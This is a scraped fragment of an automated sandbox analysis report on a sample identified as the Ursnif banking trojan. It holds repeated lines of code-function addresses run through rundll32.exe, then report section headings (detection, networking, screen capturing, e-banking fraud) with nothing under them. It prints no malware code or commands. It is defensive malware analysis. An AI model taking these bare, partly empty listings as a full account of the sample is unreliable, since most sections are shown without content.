Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435D468	35_2_000001E7A435D468
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433C458	35_2_000001E7A433C458
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43374A8	35_2_000001E7A43374A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433DC88	35_2_000001E7A433DC88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43444FC	35_2_000001E7A43444FC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4347500	35_2_000001E7A4347500
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4350D40	35_2_000001E7A4350D40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4331D20	35_2_000001E7A4331D20
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4341D14	35_2_000001E7A4341D14
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4339514	35_2_000001E7A4339514
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435ED7C	35_2_000001E7A435ED7C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43575B4	35_2_000001E7A43575B4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433559C	35_2_000001E7A433559C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43515A0	35_2_000001E7A43515A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4357DDC

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary: